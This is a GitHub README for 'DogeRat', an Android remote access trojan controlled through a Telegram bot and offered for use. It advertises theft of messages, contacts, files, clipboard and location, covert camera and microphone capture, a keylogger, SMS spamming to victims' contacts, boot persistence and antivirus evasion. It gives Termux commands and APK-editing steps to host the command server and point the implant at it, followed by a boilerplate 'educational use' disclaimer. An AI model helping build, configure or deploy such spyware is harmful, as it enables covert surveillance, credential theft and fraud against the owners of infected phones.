174 lines
6.0 KiB
Markdown
174 lines
6.0 KiB
Markdown

|
|
<p align="center">
|
|
<i>A multifunctional Telegram based Android RAT without port forwarding</i>
|
|
</p>
|
|
|
|
|
|
|
|
<h2 align="center">Panel Screenshot</h2>
|
|
<p align="center">
|
|
<img src="https://dogelina.com/dogs/scr.jpg" alt="Logo" />
|
|
</p>
|
|
|
|
|
|
## Features
|
|
- 🔴 Real time
|
|
- 🌐 custom web view
|
|
- 🔔 notification reader
|
|
- 🔔 notification sender (send custom notification that apper on target device with custom click link)
|
|
- 🗨️ show toast message on target device (Toasts are messages that appear in a box at the bottom of the device)
|
|
- 📡 receive information about simcard provider
|
|
- 📳 vibrate target device
|
|
- 🛰️ receive device location
|
|
- ✉️ receive all target message
|
|
- ✉️ send sms with target device to any number
|
|
- ✉️ send sms with target device to all of his/her contacts
|
|
- 👤 recive all target contacts
|
|
- 💻 receive list of all installedd apps in target device
|
|
- 📁 receive any file or folder from target device
|
|
- 📁 delete any file or folder from target device
|
|
- 📷 capture main and front camera
|
|
- 🎙 capture microphone (with custom duration)
|
|
- 📋 receive last clipboard text
|
|
- ✅️ auto start after device boot
|
|
- 🔐 Keylogger {Availbe in apk v1 and v2}
|
|
- ✨ Beautiful telegram bot interface
|
|
-🤖 Undetectable by antivirus
|
|
<h2>Requirements</h2>
|
|
<ul>
|
|
<li><span style="color: #0074D9;">APK EDITOR</span></li>
|
|
<li><span style="color: #2ECC40;">TERMUX</span></li>
|
|
<li>For hosting server code, you can use some free services like:</li>
|
|
<ul>
|
|
<li><a href="https://replit.com/" style="color: #FF4136;">replit.com</a></li>
|
|
<li><a href="https://glitch.com/" style="color: #FFDC00;">glitch.com</a></li>
|
|
<li><a href="https://heroku.com/" style="color: #B10DC9;">heroku.com</a></li>
|
|
</ul>
|
|
<p align="center">
|
|
<a href="https://shivaya-dav.github.io/dogeweb/">
|
|
<img src="https://img.shields.io/badge/📹%20VIDEO%20TUTORIALS%20AVAILABLE%20HERE-blue?style=for-the-badge" alt="Video Tutorials Available Here" />
|
|
</a>
|
|
</p>
|
|
<li>Keep in mind that these sites can suspend your projects, so it's better to host on your own computer.</li>
|
|
|
|
</ul>
|
|
|
|
<h2 align="center">Download</h2>
|
|
|
|
<p align="center">
|
|
<a href="https://cybershieldx.com/termux.apk">
|
|
<img src="https://img.shields.io/badge/Termux%20Download-Click%20to%20Download-brightgreen?style=for-the-badge&logo=android" alt="Download Termux" />
|
|
</a>
|
|
<a href="https://cybershieldx.com/editor.apk">
|
|
<img src="https://img.shields.io/badge/APK%20Editor%20Download-Click%20to%20Download-brightgreen?style=for-the-badge&logo=android" alt="Download APK Editor" />
|
|
</a>
|
|
</p>
|
|
|
|
|
|
## How to host server in Termux
|
|
<p>Run the following commands in Termux:</p>
|
|
|
|
|
|
|
|
```bash
|
|
pkg update && upgrade -y
|
|
pkg install git -y
|
|
git clone https://github.com/shivaya-dav/DogeRat
|
|
cd DogeRat
|
|
bash start.sh
|
|
Enter your bot token
|
|
Enter your chatid
|
|
And hit enter
|
|
Now open a new Tab, and give these commands
|
|
pkg install openssh
|
|
bash port.sh
|
|
Enter your telegram username And hit enter
|
|
Copy url and minimize the termux
|
|
```
|
|
|
|
## Edit apk
|
|
- Open Apk editor
|
|
- select apk
|
|
- choose full edit
|
|
- select decode all files
|
|
- go to assets folder
|
|
- open host.json
|
|
- and enter url
|
|
- in socket replace url https to wss
|
|
- build apk ,start the bott Enjoy
|
|
|
|
## example
|
|
```bash
|
|
{
|
|
"host": "https://yoururl.com/",
|
|
"socket": "wss://yoururl.com/",
|
|
"webView": "https://google.com/"
|
|
}
|
|
```
|
|
|
|
|
|
<h2 align="center">🔗 Contact and Social Media Accounts</h2>
|
|
|
|
<p align="center">
|
|
<a href="https://t.me/CyberShieldX">
|
|
<img src="https://img.shields.io/badge/CONTACT-TELEGRAM-blue?style=for-the-badge&logo=telegram" alt="Telegram Badge"/>
|
|
</a>
|
|
<a href="https://instagram.com/CyberShieldX">
|
|
<img src="https://img.shields.io/badge/CONTACT-INSTAGRAM-red?style=for-the-badge&logo=instagram" alt="Instagram Badge"/>
|
|
</a>
|
|
<a href="https://twitter.com/CyberShieldX">
|
|
<img src="https://img.shields.io/badge/CONTACT-TWITTER-blue?style=for-the-badge&logo=twitter" alt="Twitter Badge"/>
|
|
</a>
|
|
<a href="https://www.youtube.com/channel/UCIQVMD1wD0M02V2JbVP_KrA">
|
|
<img src="https://img.shields.io/badge/CONTACT-YOUTUBE-red?style=for-the-badge&logo=youtube" alt="Youtube Badge"/>
|
|
</a>
|
|
</p>
|
|
|
|
|
|
<p align="center">
|
|
<img src="https://img.shields.io/badge/Disclaimer-Important-red" alt="Important Disclaimer"/>
|
|
</p>
|
|
|
|
<p align="center">
|
|
<b><i>Note:</i></b> The developer provides no warranty with this software and will not be responsible for any direct or indirect damage caused by the usage of this tool. Dogerat is built for educational and internal use only.
|
|
</p>
|
|
|
|
<p align="center">
|
|
<b><i>Attention:</i></b> We do not endorse any illegal or unethical use of this tool. The user assumes all responsibility for the use of this software.
|
|
</p>
|
|
|
|
<p align="center">
|
|
<b><i>Important:</i></b> To prevent any fraudulent activity, please ensure that the Instagram username is <a href="https://instagram.com/CyberShieldX"><code>@CYBERSHIELDX</code></a> and the Telegram handle is <a href="https://t.me/CyberShieldX"><code>@CYBERSHIELDX</code></a>. Beware of scams and phishing attempts that use similar usernames or handles.
|
|
</p>
|
|
|
|
<p align="center">
|
|
<b><i>Thank you for using Dogerat - we hope it serves its intended purpose and helps you achieve your goals!</i></b>
|
|
</p>
|
|
|
|
|
|
|
|
|
|
<h2 align="center">🍻 Support 🍻</h2>
|
|
|
|
<p align="center">
|
|
<a href="https://www.buymeacoffee.com/yourusername">
|
|
<img src="https://img.shields.io/badge/-Buy%20Me%20a%20Coffee-orange?style=for-the-badge&logo=buy-me-a-coffee&logoColor=white" alt="Buy Me A Coffee"/>
|
|
</a>
|
|
</p>
|
|
|
|
<p align="center">Support this project with cryptocurrency:</p>
|
|
|
|
<p align="center">
|
|
Bitcoin: 1LeLwYyDHu51875aenZaNcEnMrEbHwEKJd<br>
|
|
USDT TRC20: TWX456AoupoYKwCYUKk3ZMWJtNJZRRHnrp
|
|
</p>
|
|
|
|
|
|
<h3 align="center">❤️ Thank you Supporters ❤️</h3>
|
|
|
|
<p align="center">
|
|
<a href="https://github.com/shivaya-dav/DogeRat/stargazers">
|
|
<img src="https://img.shields.io/github/stars/shivaya-dav/DogeRat?style=for-the-badge&color=yellow" alt="Stargazers repo roster on GitHub"/>
|
|
</a>
|
|
</p>
|